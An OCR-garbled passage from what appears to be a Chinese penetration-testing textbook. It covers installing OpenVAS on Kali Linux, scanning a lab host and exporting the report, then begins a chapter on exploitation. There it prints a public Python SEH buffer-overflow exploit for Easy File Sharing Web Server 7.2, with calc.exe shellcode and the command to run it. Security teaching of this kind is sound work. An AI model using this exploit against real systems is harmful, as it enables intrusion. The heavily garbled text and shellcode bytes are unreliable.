python3-graphql-core python3-graphql-relay python3-icalendar python3-idna 
python3-iso8601 python3-jinja2 python3-mako python3-markupsafe python3-maxminddb 
python3-mpltoolkits.basemap python3-msgpack python3-pampy python3-paramiko 
python3-pluginbase python3-promise python3-psycopg2 pyt 
python3 iptools jis sql ython3-termcolor 
python3-tzlocal py 

The following packages will be 
aant mm mm ansir amy ' La 


-bd v 


图 5-2 ”使 用 distrupgrade 命 令 对 系统 更 新 


更 新 结束 之 后 ， 束 可 以 安装 Openvas 了 ， 下 载 Openvas 的 命令 使 用 
apt-get. 





root@kali:~# apt-get install openvas 


整个 的 下 载 过 程 如 图 5-3 所 示 。 





root@kali: ~ oo o0 


File Edit View Search Terminal Help 
181 1005 0.69kB/s :00: (xfr£24, to-chk-11/36) 
dfn-cert-2014.xml 
1,530,889 100% 178.15kB/s :00: (xfr#25, to-chk-10/36) 


.23kB/s :00: (xfr#26, to-chk-9/36) 
dfn-cert-2015.xml 
2,041,489 100% 203.79kB/s :00: (xfr#27, to-chk=8/36) 
dfn-cert-2015.xml.asc 
181 100% 176.76kB/s :00: (xfr#28, to-chk-7/36) 
dfn-cert-2016.xml 
2,663,416 100% 115.36kB/s :00: (xfr#29, to-chk=6/36) 
dfn-cert-2016.xml.asc 
181 100% 0.22kB/s :00: (xfr£30, to-chk-5/36) 
dfn-cert-2017.xml 
1,429,900 100% . 32.94kB/s HE (xfr431, to-chk24/36) 
dfn-cert-2017.xml.asc 
100% 0.35kB/s :00: (xfr#32, to-chk=3/36) 


100% 3.83kB/s HUE (xfr£33, to-chk-2/36) 
100% 0.02kB/s 0:00: (xfr#34, to-chk=1/36) 


100% 0.35kB/s 0:00: (xfr#35, to-chk=0/36) 


received 35,899,587 bytes 155,749.70 bytes/sec 
total size is 35,888,475 speedup is 1.00 
/usr/sbin/openvasmd 





图 5-3 ”下 载 Openvas 的 过 程 


需要 注意 的 是 ， 如 果 网 速 不 理想 的 情况 ， 这 个 过 程 会 耗 时 很 久 。 
到 下 载 完成 之 语族 条 以 执行 安装 命 入 openva set 


root@kali:~# openvas-setup 





整个 安装 的 过 程 如 图 5-4 所 示 。 


:~# openvas setup 
: Directory for keys (/var/lib/openv as/private/C ) 
: Directory for certific 
: CA key found in /var/lib/ nvas/priva akey .I 
(: CA certificate fo in /var/lib/openvas/CA/cacert 
: CA certificate verified. 
(: Certificate / 'Lib/openvas/CA/servercert.pem verified. 
: Certificate /var/lib/openvas/CA/clientcert.pem verified. 


: Your OpenVAS certificate infrastructure passed validation. 
rsync: getaddrinfo: feed.openvas.org 873: Name or service not known 
error: error in socket IO (code 10) at clientserver.c(125) [Receiver=3.1. 
: getaddrinfo: feed.openvas.org 873: Name or service not known 
error: error in socket "d (code 18) aft clientserver. 25) [Receiver=3.1.2 
rsync: getaddrinfo: feed.openvas.org 873: Name or service not known 
rsync error: error ín socket I0 ( code 18) at clientserver.c(125) [Receiver-3.1.2 
User created with password '25a0elea-45f1-41f9-961b-a3a9e60e2350'. 


. $9 
"ias: 





K|5-A ”执行 openvas-setup 


安装 完成 之 后 ， 我 们 执行 脚本 openvas-check-setup 来 检查 安装 过 程 
是 耕 正 常 ， 如 图 5-5 所 示 。 


root@kali: ~ o o Q0 


File Edit View Search Terminal Help 
:~# openvas-check-setup 
openvas-check-setup 2.3.7 
Test completeness and readiness of OpenVAS-9 


Please report us any non-detected problems and 
help us to improve this check routine: 
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 


Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the proble 


Use the parameter --server to skip checks for client tools 
like GSD and OpenVAS-CLI. 


Step 1: Checking OpenVAS Scanner ... 

OK: OpenVAS Scanner is present in version 5.1.1. 

OK: redis-server is present in version v-3.2.9. 

OK: scanner (kb location setting) is configured properly using the redis 
-server socket: /var/run/redis/redis.sock 

OK: redis-server is running and listening on socket: /var/run/redis/redi 
FEET . 


OK: redis-server configuration is OK and redis-server is running. 
OK: NVT collection in /var/lib/openvas/plugins contains 53740 NVTs. 
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner. 





图 5-5 ”执行 openvas-check-setup 进 行 检 栓 的 过 程 


如 果 全 部 安装 过 程 都 无 误 的 话 ， 系 统 会 显示 “It seems like your 
OpenVAS-9 installation is OK”， 如 图 5-6 所 示 。 


root@kali: ~ o o o0 
File Edit View Search Terminal Help 


WARNING: Your version of nmap is not fully supported: 7.40 

SUGGEST: You should install nmap 5.51 if you plan to use the nmap NSE NV 
ES: 
Step 10: Checking presence of optional tools ... 

0K: pdflatex found. 

0K: PDF generation successful. The PDF report format is likely to work. 

0K: ssh-keygen found, LSC credential generation for GNU/Linux targets is 
likely to work. 

WARNING: Could not find rpm binary, LSC credential package generation fo 
r RPM and DEB based targets will not work. 

SUGGEST: Install rpm. 

WARNING: Could not find makensis binary, LSC credential package generati 
on for Microsoft Windows targets will not work. 

SUGGEST: Install nsis. 


It seems like your OpenVAS-9 installation is OK. 


If you think it is not OK, please report your observation 

and help us to improve this check routine: 
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the 
problem. 





4 国 


图 5-6 OpenVAS T £rZG vx HJ s 


[I-JOpenvas"H Z8 F3 J^ Z A, ZSUUBJas4 7Jopenvasmd. SIHH 
ARIMA 7J*--user-", ANA --new-password", 这 里 我 们 将 
用 户 名 和 和 密 人 码 都 设置 为 “admin”( 在 实际 操作 中 不 要 这 样 做 ， 这 里 只 是 
为 了 方便 讲述 ) 。 执 行 的 命令 为 : 


openvasmd --user=admin --new-password-admin 


到 此 为 止 ，Openvas 束 成 功 安 闭 到 了 我 们 的 系统 中 了 o 





5.2 ”使 用 OpenVas 对 目标 进行 漏洞 扫描 


OpenVas 提 供 了 一 个 Web 化 的 控制 界面 。 这 种 控制 方式 十 分 方便 ， 
只 需要 一 个 浏览 右 ， 我 们 就 可 以 在 任何 一 个 主机 上 使 用 Openvas。 现 在 
首先 在 Kali Linux 2 本 机 上 打开 这 个 服务 ， 如 图 5-7 所 示 。 


01 - Information Gathering 
02 - Vulnerability Analysis 


03 - Web Application Analysis 


09 - Sniffing & Spoofing 


10 - Post Exploitation 

11 - Forensics 

12 - Reporting Tools 

13 - Social Engineering Tools 
14 - System Services 


Usual applications 





Wine 


图 5-7 ”局 动 OpenVAS 服 务 的 快捷 方式 
局 动 成 功 之 后 ， 束 会 显示 如 图 5-8 所 示 的 结 
图 5-8 ”成 功 局 动 OpenVAS 


然后 在 浏览 器 中 输入 地 址 为 127.0.0.1， 端 口 为 9392， 使 用 的 是 https 
服务 ， 打 开 以 后 的 浏览 器 显示 如 图 5-9 所 示 。 


o oo0 


Insecure Connection - Mozilla Firefox 





J E Insecure Connection — x | €) Community Page x 中 


ec ||. Search | ow e O so 





€ ) © | https://127.0.0.1:9392 
Eg Most Visited v WlllOffensive Security ‘Ñ Kali Linux Kali Docs ‘Ñ Kali Tools KExploit-DB W Aircrack-ng 


LA Your connection is not secure 








The owner of 127.0.0.1 has configured their website improperly. To protect 
your information from being stolen, Firefox has not connected to this website. 


Learn more... 


Advanced 





图 5-9 ”第 一 次 连接 到 https:/127.0.0.1:9392 


单 击 页 面 右 侧 的 “Advanced” 选 项 ， 然 后 单 击 下 方 的 “Add 
Exception” 按 钮 ， 束 可 以 正常 打开 这 个 OpenVas 的 控制 界面 了 ， 如 图 5-10 


HIZR e 


Insecure Connection - Mozilla Firefox ooo 





J E Insecure Connection — x \@ Community Page x 中 





€ i) | https://127.0.0.1:9392 e [a Search | *o s. hf 


Eg Most Visited v WlllOffensive Security ‘Ñ Kali Linux "Kali Docs "Kali Tools KWExploit-DB W Aircrack-ng 


LA Your connection is not secure 








The owner of 127.0.0.1 has configured their website improperly. To protect 
your information from being stolen, Firefox has not connected to this website. 


Learn more... 


presses EMITE 





127.0.0.1:9392 uses an invalid security certificate. 


The certificate is not trusted because the issuer certificate is unknown. 
The server might not be sending the appropriate intermediate certificates. 
An additional root certificate may need to be imported. 

The certificate is only valid for kali 


Error code: SEC. ERROR. UNKNOWN. ISSUER 


图 5-10  Z7jOpenVasZJH— ^ f^ 


新 版 的 OpenVas 界 面 上 有 了 一 些 改变 ， 但 仍 采 用 一 个 绿色 的 恐龙 头 
上 骨 ， 如 图 5-11 所 示 ， 这 也 是 官 理 界 而 名 称 “Greenbone”( 绿 骨头 ) 的 由 


来 。 


Greenbone Security Assistant - Mozilla Firefox o o o0 
| 4 Greenbone Security A... x | @ Community Page x 中 





€) © A |https://127.0.0.1:9392/login/login.htiml v | c | [Q s wO 44a 三 
Eg Most Visited v Offensive Security ‘Ñ Kali Linux Kali Docs "Ñ Kali Tools KliExploit-DB Aircrack-ng 





图 5-11 OpenVashj ók rr AE HEA IR] 


在 这 个 界面 中 输入 我 们 在 安装 时 设 定 的 用 户 名 和 密码 即 可 完成 登 
录 ， 如 图 5-12 所 示 。 





Greenbone Security Assistant - Mozilla Firefox o o o0 
jJ 4 Greenbone Security A... x \@ Commu nity Page x + | 
€ ) © Q |https://127.0.0.1:9 login/login.html C ||Q Search A O 4 A 三 

Eg Most Visited v 上 Offensive Security "& Kali Linux ‘Ñ Kali Docs "Ñ Kali Tools KliExploit-DB Aircrack-ng 





图 5-12 ”输入 用 户 名 和 密码 


用 户 名 和 密码 正确 之 后 ， 我 们 就 可 以 看 到 OpenVas 的 操作 界面 了 了 ， 
如 图 5-13 所 示 。 操 作 主 要 是 依 菲 洒 早 实现 的 。 这 里 面 的 洒 早 选项 


H “Dashboard”“Scans”“Assets”“SecInfo”“Configuration”“Extra”“ Administre 


个 选项 共同 构成 。 





图 5-13 ”局 动 之 后 的 OpenVas 控 制 界 面 


下 面 我 们 以 实例 来 开始 一 次 对 目标 的 扫 摘 ， 首 先 单 击 腕 单 栏 上 
的 “Scans”， 然 后 在 弹出 的 下 拉 沈 单 中 选中 “Tasks”。 


图 5-14 是 一 个 提示 界面 ， 关 闭 即 可 。 然 后 我 们 单 击 快捷 工具 栏 上 的 
星 状 图 标 ， 并 在 弹出 的 下 拉 表 里 中 选中 “New Task”( 见 图 5-15)。 


INIZ | Welcome to the scan task management! 
A 
If you would like to start your first vulnerability scan, the scan 
wizard can help you to do so with just one click. 


Simply select the wizard icon from the icon bar in the top-left of this 
page. 


7 ll 


图 5-14 ”OpenVas 提 示 界 面 


Dashboard Scans SecInfo 


7 i arali 
New Container Task | 
New Task. 
From. | 





vV Tasks (0 of 0) 
图 5-15 ”选中 OpenVas 中 的 “New Task” 3 Ff i25 Ji 


系统 会 弹出 一 个 新 任务 菜单 ， 在 这 个 任务 菜单 中 需要 填写 名 称 、 注 
释 等 ， 其 中 最 为 天 键 的 是 目标 (Scan Targets") ， 如 图 5-16 所 示 。 


Name X unname d 
Comment 
Scan Targets v E] 
Alerts g 
口 once £3 


Apply Overrides yes O no 
Min QoD 3 
Alterable Task © yes (8) no 
Auto Delete — (8) Do not automatically delete reports 


rt ^ 
ue ©, Automatically delete oldest reports but always keep newest oU B reports 


Scanner | OpenVAS Default 


图 5-16 OpenVas ISTE AS KHE 
单 击 “Scan Targets" [l| ES] E 3A Bees, 9L RE M TG] H RRE, 
我 们 这 里 以 一 个 同 网 段 的 主机 作为 扫描 的 目标 ， 将 192.168.169.131 作 为 
扫描 目标 ， 如 图 5-17 所 示 。 


New Target x 

















Name [target 

omm | 

Hosts 

Exclude Hosts 

Reverse Lookup Only Q) No 

Reverse Lookup Unify 图 No 

Port ll IANA assigned TC a" 
Aliv fig Default 

Cred ls for authen d check 


图 5-17 ”创建 一 个 扫 摘 的 目标 


当 目 标的 所 有 的 信息 都 成 功 填 完 之 后 ， 单 击 “create” 按 钮 ， 完 成 对 
该 目标 的 创建 之 后 ， 系 统 会 返回 到 任务 创建 采 单 ， 将 目标 设 定 
为 “target*， 如 图 5-18 所 示 。 





o Delete @ Do not automatically delete reports 
Reports $ 
3B \ Automatically delete oldest reports but always keep newest 5 B reports 


Scanner OpenVAS Default 


图 5-18” 设 定 要 进行 扫描 的 日 标 


除了 名 字 和 目标 之 外 ， 其 他 的 内 容 保持 默认 即 可 ， 议 置 结束 之 后 ， 
单 击 “create”， 即 可 完成 任务 的 创建 。 图 5-19 给 出 了 创建 好 的 任务 列表 ， 
这 个 列表 位 于 整个 页 面 的 最 下 方 。 





2017/8/8test [mt ml i urit 
o pag sv 


图 5-19 ”任务 列表 


我 们 选中 任务 之 后 ， 然 后 单 击 任务 右 侧 Actions 列 里 面 的 执行 按钮 
( 吏 是 那个 有 上 昌 色 三 角 的 绿色 按钮 ) ， 任 务 孢 开始 了 ， 开 始 执行 之 后 的 
Status 束 会 变 成 黄色 的 Requested， 如 图 5-20 所 示 。 





2017/8/8test 


zm m d n RR 
CNN Cm ME: 
MEL 
/Ap y to 


图 5-20 ”局 动 扫描 之 后 的 任务 列表 


在 这 个 扫 拉 过程 中 ， 一 直到 扫 摘 完成 ， 状 态 都 不 会 发 生 改 变 ， 如 果 
我 们 硕 望 状态 能 刷新 的 话 ， 可 以 单 击 上 方 的 "No auto-refresh” 将 其 修改 ， 
如 图 5-21 所 示 。 


Mo auto-refresh É 
Seclnfo xtras 





' No auto-refresh | 
Refresh every 30 Sec. 
=70 apply c [=nName 
Refresh every 60 Sec. 
Refresh every 2 Min. 


Refresh every 5 Min. 


图 5-21 ”修改 刷新 频率 


这 里 我 们 将 刷新 频率 改 为 “Refresh every 60 Sec", — 这 样 每 隔 一 分 钟 
我 们 融 可 以 看 到 新 的 扫描 进度 了 ， 如 图 5-22 上 所 示 。 







PEERS 


2017/8/8test 0 (1) LCDOEAÁAZU 
vApply to page contents v Hg 





5-22 ”显示 扫 摘 状态 
如 图 5-23 所 示 ， 当 status 的 值 为 "Done” 的 时 候 ， 扫 摘 丈 完成 了 。 
or 


2017/8/8test n 1 (1) Aug8 2017 DOEUÀUAADZUU 





图 5-23 HHEH 


5.3 ”查看 OpenVas 的 扫描 报告 


当 扫 摘 绪 束 后 ，OpenVas 会 为 我 们 生成 一 份 详实 有 效 的 漏洞 扫 摘 报 
告 ， 如 图 5-24 所 示 。 如 果 你 想 否 看 详细 的 扫 拉 报告， 可 以 单 击 Reports 中 
Last 下 面 的 数字 。 








1(1) [Aug 8 2017 


图 5-24 生成 的 报告 


蛙 击 图 5-24 中 所 示 的 日 期 束 可 以 看 到 报告 的 评 细 内 容 ， 这 里 面 的 内 
容 仍然 是 以 列表 形式 展现 的 ， 如 图 5-25 所 示 。 最 左面 Vulnerablity 显 示 的 
是 漏洞 的 名 称 ，Severity 显 示 的 是 汤 凋 的 威胁 级 别 ，Host 显 示 的 是 存在 
该 漏洞 的 主机 ，Location 表 示 漏 洞 的 端口 。 


( D) ID: 7b74f605-f1e7-4c41-9541-6eclaf5ecf95 
€&, Modified: Tue Aug 8 06:32:34 2017 

Created: Tue Aug 8 06:08:55 2017 
&.. Report: Results (8 of 39) wir ma 


Owner: admin 


1-8of8 


Microsoft Windows SMB Server Multiple 


Vulnerabilities-Remote (4013389) | 95% 192.168.169.131 445/tp Eš 
SSL/TLS: Missing `secure` Cookie Attribute 国 BZC 29% 192.168.169.131 443/tp AR 
Missing ' httpOnly' Cookie Attribute a 80% 192.168.169.131 443/tcp BR 
Missing ` httpOnly' Cookie Attribute e 80% 192.168.169.131 80/tcp gy 
DCE Services Enumeration Reporting aci 80% 192.168.169.131 135/tp Ew 
SSL/TLS: Certificate Expired 国 EEGIETNNEEM 9899 192.168.169.131 443/tp AR 
META EM E ER s0% 192.168.169.131 443/tp ”回国 
TCP timestamps e i 80% 192.168.169.131 general/tcp 3» 


:autofp-0 apply overrides-1 notes-1 overrides-1 result hosts only-1 first21 rows-100 1-8of: 
sort-reverse-severity levels=hml| min qod-70 er e T 


图 5-25 ”OpenVas 扫 摘 漏 洞 列表 


里 面 显示 的 漏 词 是 按照 威胁 级 别 从 高 到 低 来 排列 的 ， 可 以 看 到 这 
SIRE AR 别 最 高 的 是 一 个 SMB Server Multiple Vulnerabilities- 
Remote(4013389)。 如 有 果 你 对 这 个 漏洞 不 了 解 的 话 ， 那 么 可 以 单 击 这 个 
漏 铀 的 名 称 ， 会 显示 出 访 漏 洞 的 详细 信息 ， 如 图 5-26 所 示 。 





«5 Result: Microsoft Windows SMB Server Multiple Vulnerabilities-Re 


Vulnerability 


Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) 


Summary 
This host is missing a critical security update according to Microsoft Bulletin MS17-010. 


Vulnerability Detection Result 
Vulnerability was detected according to the Vulnerability Detection Method. 


Impact 
Successful exploitation will allow remote attackers to gain the ability to execute code on the target server, also could lead to informal 


Impact Level: System 


Solution 
Solution type: © VendorFix 


Run Windows Update and update the listed hotfixes or download and update mentioned hotfixes in the advisory from the below link, 
Affected Software/OS 

Microsoft Windows 10 x32/x64 Edition Microsoft Windows Server 2012 Edition Microsoft Windows Server 2016 Microsoft Windows 8 
Windows Server 2008 R2 x64 Edition Service Pack 1 Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 


Vulnerability Insight 
Multiple flaws exist due to the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 


Vulnerability Detection Method 
Send the crafted SMB transaction request with fid = 0 and check the response to confirm the vulnerability. 


Details: Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) (OID: 1.3.6.1.4.1.25623.1.0.810676) 


Version used: $Revision: 6223 $ 
References 


CVE: CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148 
BID: 96703, 96704, 96705, 96707, 96709, 96706 


图 5-26 “SMB Server Multiple Marone a i8] I E 
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dae ar is LIRE, EFHRJScans,. Sa MpL BG 
中 “Results” 来 获得 一 个 图 表 化 的 扫 挡 报告， 如 图 5-27 所 示 。 


€ Results (39 of 40 


+ Results by CVSS (Total: 39) 


v Results by Severity Class (T... v Results vulnerability word c... 
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图 5-27 图表 化 的 扫 摘 报告 
我 们 也 可 以 将 这 份 报告 按照 指定 的 格式 导出 ， 这 样 束 可 以 获得 一 份 
书面 的 漏 润 报 告 。 首 先 单 击 淋 早上 的 “Scans” 按 钮 ， 然 后 在 下 拉 采 蛙 中 
选中 “Tasks”， 单 击 下 面 任务 中 的 日 期 ， 如 图 5-28 所 示 。 


Reports 





1(1) [Aug 8 2017 


图 5-28 打开 报告 


单 击 日 期 之 后 ， 然 后 单 击 这 个 页 面 左 上 方 的 导出 ， 这 里 面前 面 是 导 
出 格式 ， 包 括 CSV、HTML、PDE 等 多 种 格式 ， 如 图 5-29 所 示 。 








Kd Anonymous XML = HSS X Filter: 
e autofp-0 apply overrides-1 note 
| sort-reverse-severity levels-hm 


p 


《 ARF 
上 Results (8 of 39) 
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o" Jc 
Mi, HTML Server Multiple ! 
5S 
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图 5-29 ”OpenVas 文 持 的 报告 导出 格式 


选择 好 要 导出 的 格式 ， 例 如 最 为 通用 的 XML 格式 ， 然 后 单 击 右 侧 
的 有 白色 回 下 箭头 的 绿色 按钮 。OpenVas 报 告 的 保存 选项 如 图 5-30 所 
7e 


Opening report-7b74f605-f1e7-4c41-9541-6eclaf5ecf95.xm| | Q 


You have chosen to open: 
^ report-7b74f605-f1e7-4c41-9541-6eclaf5ecf95.xml 


which is: XML document (78.1 KB) 
from: https://127.0.0.1:9392 


What should Firefox do with this file? 


© Open with Text Editor (default) y 


O Save File 


| )Dothis automatically for files like this from now on. 


| Cancel | 


图 5-30 ”OpenVas 报 告 的 保存 选项 


这 份 报告 默认 是 保存 在 Downloads 目 录 中 ， 如 图 5-31 所 示 。 


< >) |4 省 Home | Downloads | » 
Y Recent 
2 </> 
E 7b74f605- 
m esop fle7-4c41- 
9541- 
Pf inii Geclaf5ecf9 


5.xml 


(3) Downloads 





JI Music 


i1 Pictiirec 


图 5-31 保存 在 Downloads 目 录 中 的 OpenVas 报 告 


这 份 报告 在 后 面 的 漏洞 渗透 阶段 会 使 用 到 ， 万 外 也 可 以 应 用 在 最 后 
的 报告 编写 阶段 。 


5.4 小结 


在 这 一 章 中 ， 我 们 介绍 了 在 漏洞 扫描 阶段 需要 完成 的 任务 。 在 本 章 
最 开始 的 时 候 ， 我 们 提 到 了 3 个 相当 优秀 的 漏洞 扫描 工具 ， 并 对 它们 的 
优 筋 进行 了 比较 。 


接 下 来 我 们 详细 地 介绍 了 OpenVas 的 使 用 ， 首 先是 如 何在 Kali Linux 
2 安装 和 配置 OpenVas， 然 后 是 如 何 使 用 这 个 工具 对 目标 进行 扫 接 ， 最 
后 讲解 了 OpenVas 的 报告 生成 功能 。 在 这 个 阶段 生成 的 报告 十 分 重要 ， 
一 来 我 们 需要 依 徘 这 份 报 告 来 确定 在 下 一 个 汤 凋 渗透 阶段 的 工作 ， 二 来 
这 份 报 告 也 将 会 是 着 将 渗透 测试 报告 的 重要 组 成 部 分 。 

现在 我 们 已 经 知道 目标 系统 中 存在 哪些 漏洞 了， 那么 接 下 来 我 们 访 


做 些 什 么 呢 ? 从 下 一 革 开 始 ， 我 们 将 会 讲解 如 何 利 用 已 经 获得 的 信息 对 
目标 进行 渗透 。 


人 EL 
6 


第 6 章 
远程 控制 


好 了 ， 通 过 第 5 章 的 学 习 我 们 已 经 可 以 找 出 目标 系统 的 漏洞 了 。 可 
症 接 下 来 我 们 的 工作 是 什么 呢 ? 在 我 多 年 从 事 网 络 安全 教学 的 经 历 中 ， 
学 生 们 在 此 时 都 会 问 “老师 ， 我 已 经 发 现 了 目标 计算 机 的 菏 攻 汤 凋 ， 那 
么 接 下 来 该 做 什么 才能 入 侵 进 去 呢 ?”。 


其 实 接 下 来 要 做 的 很 简单 ， 束 是 癌 目 标 系统 及 大 一 个 程序 。 这 个 程 
序 通 第 由 两 个 子 程 序 构成 : 一 个 是 针对 目标 漏 调 的 渗透 程序 ， 为 了 区 分 
起 见 ， 我 们 将 这 个 子 程序 称 为 A， 万 一 个 是 在 目标 系统 完成 指定 任务 的 
程序 ， 我 们 将 这 个 子 程序 称 为 B。 进 行 渗透 的 时 候 ， 我 们 将 于 程序 A 和 
于 程序 B 一 起 及 送 到 目标 系统 的 特定 哨 口 上 ， 子 程序 A 会 利用 目标 系统 
的 漏洞 ， 在 目标 系统 上 执行 子 程序 B。 子 程序 B 的 作用 是 在 目标 上 执行 
一 些 任务 ， 比 如 远程 控制 、 信 息 监 听 、 文 件 下 载 等 。 


我 们 将 分 两 草 来 讲解 这 两 个 子 程序 ， 本 章 将 会 按照 如 下 几 扣 来 讲解 


e 湄 将 滩 史 模块 的 简单 介绍 

e 远程 控制 程序 基础 

e 如 何在 Kali Linux 2 中 生成 被 控 端 

e 如 何在 Kali Linux 2 中 启动 主 控 端 

e Meterpreter 在 各 种 操作 系统 中 的 应 用 
e {$H Veil-Evasion t Z& Si EX 4. 


6.1 漏洞 渗透 模块 的 简单 介绍 


我 们 先 来 简单 了 解 一 下 漏洞 渗透 模 其 《于 程序 A) ， 但 这 只 是 为 了 
讲述 方便 ， 关 于 汤 凋 渗透 模块 〈 子 程序 A) 的 具体 讲解 将 在 下 一 草 进 
行 。 

如 来 把 漏洞 比 作 是 一 栋 建 筑 物 中 上 了 锁 的 入 口 的 话 ， 那 么 现在 我 们 
需要 的 就 是 一 把 能 打开 入 口 的 钥匙 。 而 这 把 钥匙 束 是 漏洞 渗透 模块 ， 我 
们 的 工作 就 是 要 找到 这 个 漏洞 渗透 模块 。 当 然 你 可 以 编写 一 个 针对 汤 凋 
的 渗透 模块 ， 但 是 这 寅 要 十 分 熟练 的 软件 调试 、 他 回 和 编程 的 功 捕 。 网 
络 安全 渗透 测试 工作 人 员 即 使 具备 这 些 技能 ， 往 往 也 没有 足够 的 时 间 来 
编写 所有 的 漏洞 渗透 醒 块 。 


每 个 人 能 完成 的 工作 很 有 限 ， 但 是 如 果 将 每 个 人 与 的 漏 铜 渗透 模块 
都 集中 在 一 起 的 话 ， 就 会 像 无 数 的 江 流 汇聚 成 大 海 一 样 ， 我 们 在 进行 漏 
洞 渗透 测试 时 也 束 会 方便 很 多 。 网 站 https://www.exploit-db.com/ 束 完成 
了 这 样 的 工作 ， 我 们 在 这 个 地 址 中 几乎 可 以 找到 当前 世界 上 所 有 已 被 友 
现 的 漏洞 。 截 全 本 书 编 写 之 前 ， 这 个 网 站 已 经 收集 了 三 万 多 个 漏洞 渗 和 还 
模块 ， 如 图 6-1 所 示 。 


ERRED o - em 


Shellcode Papers Google Hacking Database Submit Search 


Offensive Security's Exploit Database Archive 3/548 


The Exploit Database - ultimate archive of Exploits, Shellcode, and Security Papers. New to the site? Learn about the Exploit Database. Exploits Archived 


searchsploit 
chsploit [options] terml [term2 


Xd i 
searc shalo it afd windo 
archsploit -t oracle 





6-1 *www.exploit-db.com/" I] È Ji 


除了 在 这 个 网 站 中 去 查找 渗透 模块 ， 万 外 也 可 以 使 用 Kali Linux 2 系 
统 目 市 的 漏洞 库 。 在 这 个 RR RIMEN T exploit-db 漏 洞 库 的 找 贝 。 我 
们 可 以 使 用 “searchsploit”* 命 令 在 Kali Linux 2 中 得 找 需 要 的 渗透 模块 。 


例如 我 们 仍然 以 EasyFileSharing 这 个 软件 为 目标 《在 第 4 章 中 我 们 使 
用 Nmap 对 目标 进行 扫 摘 ， 已 经 得 知 了 目标 主机 上 运行 看 这 个 软件 ) 
当 我 们 知道 了 目标 计算 机 上 运行 厦 EasyFileSharing 程 序 之 后 ， 束 可 以 在 
这 e apr er ice ra | 天 的 漏洞 ， 奏 找 的 方法 是 在 Kali Linux 2 
打开 一 个 终端 ， 然 后 在 其 中 执行 “searchsploit” 命 令 : 


root@kali: ~#searchsploit easy file sharing 


执行 的 结果 如 图 6-2 所 示 。 


root@kali: ~ ooo0 
File Edit View Search Terminal Help 


Remote Buffe | windows/remote/845.c 
FTP Server 2.0 - (PASS) Re | windows/remote/2234.py 
Web Server 4 - Remote Info | windows/remote/2690.c 
FTP Server 2.0 (Windows 20 | windows/remote/3579.py 


5.8 - Multiple windows/remote/17063.txt 

HTTP Server 7.2 - SEH Over | windows/remote/39661.rb 
Web Server 1.2 - Informati | windows/remote/23222.txt 
Web Server 3.2 - ids: ie | windows/remote/27378.txt 
.8 - k Buf | windows/remote/33352.py 

FTP Server 3.5 - st ext k Buf | windows/remote/33538. by 


windows/remote/38829.py 

- GET HTTP | windows/remote/39008.py 

Web Server 7.2 - HEAD HTTP | windows/remote/39009.py 

Web Server 7.2 - SEH Overf | windows/remote/40178.py 
WebServer 6.8 - Persistent | php/webapps/35626.txt 





Klo-2 #ÆkKali Linux 2 中 查找 到 的 渗透 模块 


图 6-2 中 的 表 分 为 两 列 ， 左 边 一 列 给 出 了 汤 洞 渗透 模块 的 名 称 ， 石 
边 一 列 给 出 了 所 在 的 位 置 。 例 如 我 们 仍然 以 倒数 营 二 个 的 远程 沪 出 漏洞 
渗透 模块 为 例 ， 对 应 所 在 的 位 置 /usr/share/exploitdb/ 
platforms/windows/remote/39009.py。 这 是 一 个 使 用 python 编 写 的 脚本 ， 
利用 溢出 漏洞 实现 了 在 目标 计算 机 执行 计算 大 程序 。 我 们 打开 这 个 程序 


看 一 下 : 


# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH 


Buffer Overflow 

# Date: 12/2/2015 

Exploit Author: ArminCyber 
Contact: Armin.Exploit()ggmail.com 
Version: 7.2 

Tested on: XP SP3 EN 
category: Remote Exploit 
Usage: ./exploit.py ip port 
import socket 

import sys 

host = str(sys.argv[1]) 

port = int(sys.argv[2]) 

a - socket.socket() 


TE dk HHHH 


print "Connecting to: " + host + ":" 


a.connect( (host,port)) 
entire-4500 

# Junk 

buff = "A"*4061 

# Next SEH 

buff+= "AxebNxOANXx90Nx90" 
# poppop ret 

buff+= "Ax98Nx97Nx01Nx10" 
buff+= "Xx90"*19 

# calc.exe 

i Bad Characters: \x20 \x2f \x5c 
shellcode - ( 


+ str(port) 


"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 
"\Xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 
"\xXOb\x61\xað0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xað0\xfc\xbc\x82\x23\xa8" 
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 


"\x1c\x39\xbd" 


buff+= shellcode 

buff+= "Xx90"*7 

buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) 
# HEAD 

a.send("HEAD " + buff + " HTTP/1.0NXrXnNrAn") 
a.close() 

print "Done..." 





在 Kali Linux 2 下 打开 一 个 终 凯 窗口， 执行 这 个 Python 脚本 。 在 执行 
时 需要 提供 两 个 参数 (目标 主机 地 址 和 目标 端口 ) ， 这 里 面 我 们 以 
192.168.169.131 作 为 目标 主机 地 址 ， 将 80 作 为 目标 病 口 : 


root@kali:~# python /usr/share/exploitdb/platforms/windows/remote/39009.py 
192.168.169.131 80 


n4 BEI JS. BXSTRIAGNLTIEBZ$]192.168.169.131880*]5 
口 ， 并 将 指定 的 代码 发 送 过 去 : 


root@kali:~# python /usr/share/exploitdb/platforms/windows/remote/39009.py 
192.168.169.131 80 


Connecting to: 192.168.169.131:80 
Done... 





现在 ， 我 们 到 目标 计算 机 上 和 奉 看 一 下 ， 如 图 6-3 的 所 示 ， 可 以 看 到 
